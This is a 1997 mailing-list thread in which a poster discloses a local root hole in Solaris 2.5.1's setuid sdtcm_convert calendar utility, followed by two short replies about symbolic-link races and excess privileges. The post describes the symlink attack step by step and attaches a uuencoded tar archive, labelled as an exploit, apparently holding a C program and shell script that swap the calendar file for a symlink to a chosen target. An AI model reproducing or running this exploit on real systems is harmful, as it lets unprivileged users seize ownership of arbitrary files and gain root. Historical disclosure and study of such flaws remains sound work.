Security hole in Solaris 2.5 (sdtcm_convert) + exploit
Sat Feb 22 15:25:48 EET 1997 Romania Another hole in Solaris I have found a security hole in sdtcm_convert on Solaris 2.5.1. sdtcm_convert - calendar data conversion utility - allows any user to change the owner for any file (or directory) from the system or gain root access. The exploit is very simple. Change the permision mode of your calendar file (callog.YOU) from /var/spool/calendar directory (usual r--rw----) and run sdtcm_convert. sdtcm_convert 'll observe the change and 'll want to correct it (it 'll ask you first). You have only to delete the callog file and make a symbolic link to a target file and your calendar file and said to sdtcm_convert 'y' (yes). sdtcm_convert 'll make you the owner of target file ... A simple way to correct this is to get out suid_exec bit from sdtcm_convert I made an exploit, so you have to extract the text, uudecode it, and exec a 'tar -xf exploit.tar'. You'll get the files in exploit_dir. Cristian Schipor - Computer Science Faculty - Bucharest - Romania Email: skipo@math.pub.ro skipo@sundy.cs.pub.ro skipo@ns.ima.ro Phone: (401) 410.60.88 begin 600 exploit.tar M97AP;&]I=%]D:7(O4D5!1$U% M M # Q,# V,# ,# P,#0V, P,# P-#4W # P,# P,# Q,#(Q M # V,S S-3<Q,3<W # P,30U-#( , M M !U<W1A<@ P,'-K:7!O M <W1U9#, M P,# P,#0P # P,# R,#< M M M M J2&]W('1O(&UA:V4@82!S:6UP;&4@8V%L;&]G M(&9I;&4J"@I)9B!Y;W4@9&]N="!H879E(&$@+W9A<B]S<&]O;"]C86QE;F1A M<B]C86QL;V<N64]5(&5D:70@8V%L;&]G+F5X86UP;&4L"G)E<&QA8V4@)W-K M:7!O)R!W:71H('EO=7(@=7-E<B!N86UE(&%N9" G<W5N9'DN8W,N<'5B+G)O M)R!W:71H('EO=7(*;6%C:&EN92!N86UE("AT<GD@9FER<W0@=&AE('-H;W)T M(&YA;64L(&5X86UP;&4Z('-U;F1Y(&%N9"!I9B!Y;W4G;&P@:&%V90IT<F]U M8FQE<VAO=&EN9W,@=')Y('1H92!L;VYG(&YA;64L(&5X86UP;&4@<W5N9'DN M8W,N<'5B+G)O*2X@069T97(@=&AA= IC;W!Y('1H92!N97<@8V%L;&]G(&9I M;&4@:6X@+W9A<B]S<&]O;"]C86QE;F1A<B]C86QL;V<N64]54E]54T527TY! M344L(')U;@IO;F-E('-D=&-M7V-O;G9E<G0@=VET:"!Y;W5R('5S97(@;F%M M92 H97AA;7!L92!S9'1C;5]C;VYV97)T('-K:7!O*0IA;F0@=V%I="!F;W(@ M8V]R<F5C=&EO;G,N($YO=R!Y;W4@87)E(')E861Y('1O(')U;B!T:&4@97AP M;&]I="X* M M M M M M M M M M M 97AP;&]I=%]D:7(O8V%L;&]G+F5X86UP;&4 M M # Q,# W,# ,# P,#0V, P,# P-#4W # P,# P M,# Q,S(P # V,S S-38W-#0T # P,38U,#4 , M M !U<W1A<@ P M,'-K:7!O <W1U9#, M P,# P,#0P # P,# R,#< M M M M !697)S:6]N.B T"BHJ*BH@<W1A<G0@ M;V8@;&]G(&]N($9R:2!$96,@(#8@,30Z,#<Z-#,@,3DY-B J*BHJ"@HH8V%L M96YD87)A='1R:6)U=&5S("@B+2\O6$%024$O0U-!+T-!3$%45%(O+TY/3E-' M34P@06-C97-S($QI<W0O+T5.(BPB,3 Z86-C97-S7VQI<W0B+")W;W)L9#HR M(BD**"(M+R]805!)02]#4T$O0T%,05144B\O3D].4T=-3"!#86QE;F1A<B!. M86UE+R]%3B(L(C4Z<W1R:6YG(BPB<VMI<&] <W5N9'DN8W,N<'5B+G)O(BD* M*"(M+R]805!)02]#4T$O0T%,05144B\O3D].4T=-3"!#86QE;F1A<B!/=VYE M<B\O14XB+"(V.G5S97(B+")S:VEP;T!S=6YD>2YC<RYP=6(N<F\B*0HH(BTO M+UA!4$E!+T-302]#04Q!5%12+R].3TY31TU,($-H87)A8W1E<B!3970O+T5. M(BPB-3IS=')I;F<B+")#+DE33RTX.#4Y+3$B*0HH(BTO+UA!4$E!+T-302]# M04Q!5%12+R].3TY31TU,($1A=&4@0W)E871E9"\O14XB+"(W.F1A=&5?=&EM M92(L(C$Y.38Q,C V5#$R,#<T,UHB*0HH(BTO+UA!4$E!+T-302]#04Q!5%12 M+R].3TY31TU,(%!R;V1U8W0@261E;G1I9FEE<B\O14XB+"(U.G-T<FEN9R(L M(BTO+T14+R].3TY31TU,($-A;&5N9&%R(%!R;V1U8W0@5F5R<VEO;B Q+R]% M3B(I"B@B+2\O6$%024$O0U-!+T-!3$%45%(O+TY/3E-'34P@5F5R<VEO;B\O M14XB+"(U.G-T<FEN9R(L(BTO+UA!4$E!+T-302]615)324].,2].3TY31TU, M($-302!697)S:6]N(#$O+T5.(BD**0H M M M M M M M 97AP;&]I=%]D:7(O;W)A;F=E+F, M M # Q,# V,# ,# P,#0V, P,# P-#4W M # P,# P,# Q,C0V # V,S S-38W,S(R # P,34S,#< , M M !U M<W1A<@ P,'-K:7!O <W1U9#, M P,# P,#0P # P,# R,#< M M M M C:6YC;'5D92 \<W1D:6\N M:#X*(VEN8VQU9&4@/'-Y<R]T>7!E<RYH/@HC:6YC;'5D92 \<WES+W-T870N M:#X*(VEN8VQU9&4@/'5N:7-T9"YH/@H*(V1E9FEN92!P871H(" B+W9A<B]S M<&]O;"]C86QE;F1A<B]C86QL;V<N(@H*"G9O:60@;6%I;BAI;G0@87)G8RP@ M8VAA<B J87)G=EM=*0I["FEN="!P:60L9FEL961E<ULR73L*1DE,12 J9CL* M<W1R=6-T('-T870@:6YF;SL*;&]N9R!I.PIC:&%R('1A<F=E=%LQ,CA=+'-H M:69T6S$R.%T["@D*"7-T<F-P>2AT87)G970L87)G=ELQ72D["@ES=')C<'DH M<VAI9G0L<&%T:"D["@ES=')C870H<VAI9G0L87)G=ELR72D["@EI9BAP:7!E M*&9I;&5D97,I*0H)>PH)"7!E<G)O<B@B8V%N="!C<F%T92!P:7!E7&XB*3L* M"0EE>&ET*# I.PH)?0D*"6EF*'!I9#UF;W)K*"D]/3 I"@E["@D)9F]R*&D] M,#MI/#,P,# P,# P.VDK*RD["@D)=6YL:6YK*'-H:69T*3L*"0ES>6UL:6YK M*'1A<F=E="QS:&EF="D["@D)=W)I=&4H9FEL961E<ULQ72PB>5QN(BQS:7IE M;V8H(GE<;B(I*3L*"7T)"0D)"@EE;'-E( H)>PH)"6-L;W-E*# I.PH)"61U M<"AF:6QE9&5S6S!=*3L*"0ES>7-T96TH(FQE;6]N(BD["@D)<W1A="AT87)G M970L)FEN9F\I.PH)"6EF*&EN9F\N<W1?=6ED/3UG971U:60H*2D@<')I;G1F M*")#3TQ,($D@9&ED($E4("$A(5QN(BD["@E]"@D*?0H M M M M M M M M 97AP;&]I=%]D:7(O=&AE9FER<W0 M M # Q,# W,# ,# P,#0V, P M,# P-#4W # P,# P,# P-S0W # V,S S-38W,S,R # P,34T-3( , M M M !U<W1A<@ P,'-K:7!O M<W1U9#, P,# P,#0P # P,# R M,#< M M M O8FEN+V5C:&\@ M(F]R86YG92YC("T^(&]R86YG92(*9V-C("UO(&]R86YG92!O<F%N9V4N8PH* M+W5S<B]U8V(O=VAO86UI(#X@=V@*<F5A9"!54T52(#P@+B]W: H*(W=A=&-H M:6YG(&9O<B!C86QL;V<@9FEL92!I9B!I="!I<VYT('=I;&P@<W1O< II9B A M('1E<W0@+68@+W9A<B]S<&]O;"]C86QE;F1A<B]C86QL;V<N)%5315([('1H M96X*(" O8FEN+V5C:&\@(DD@8V%N="!F;W5N9"!C86QL;V<@9FEL92X@4&QE M87-E(')E860@4D5!1$U%(&%N9"!C<F5A=&4@:70B"B @97AI=#L*9FD*"B]B M:6XO96-H;R B=VAA="=S('1H92!T87)G970@/S\_(@IR96%D(%1!4D=%5 H* M+V)I;B]E8VAO("]B:6XO8VAM;V0@,# P("]V87(O<W!O;VPO8V%L96YD87(O M8V%L;&]G+B154T52(#YL96UO;@HO8FEN+V5C:&\@+W5S<B]D="]B:6XO<V1T M8VU?8V]N=F5R=" D55-%4B ^/FQE;6]N"B]B:6XO8VAM;V0@-S P("XO;&5M M;VX*"BXO;W)A;F=E("1405)'150@)%5315(* M M M M M M M M M M M M M M M M M M M M M M I end
Someone in Romania writes:
Another hole in Solaris
Horrors no!
The exploit is very simple. Change the permision mode of your calendar file (callog.YOU) from /var/spool/calendar directory (usual r--rw----) and run sdtcm_convert. sdtcm_convert 'll observe the change and 'll want to correct it (it 'll ask you first). You have only to delete the callog file and make a symbolic link to a target file and your calendar file and said to sdtcm_convert 'y' (yes). sdtcm_convert 'll make you the owner of target file ...
Where would Unix be without symbolic links and race conditions? This is cute, in that rather than having to mung a symbolic link on the fly, the program conveniently asks for user input with suid set, and then pauses while you set the trap. Good work. -- Mike Duvos $ PGP 2.6 Public Key available $ mpd@netcom.com $ via Finger. $
At 09:36 AM 2/22/97 -0800, Mike Duvos wrote:
Another hole in Solaris Horrors no!
.....
Where would Unix be without symbolic links and race conditions?
This is cute, in that rather than having to mung a symbolic link on the fly, the program conveniently asks for user input with suid set, and then pauses while you set the trap.
As with many programs from the BSD universe, it's running with root privileges when it could have gotten by with group privileges or run as "nobody" or some other safe approach instead.... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com # You can get PGP outside the US at ftp.ox.ac.uk/pub/crypto/pgp # (If this is a mailing list, please Cc: me on replies. Thanks.)
participants (3)
-
Bill Stewart -
Cristian SCHIPOR -
mpd@netcom.com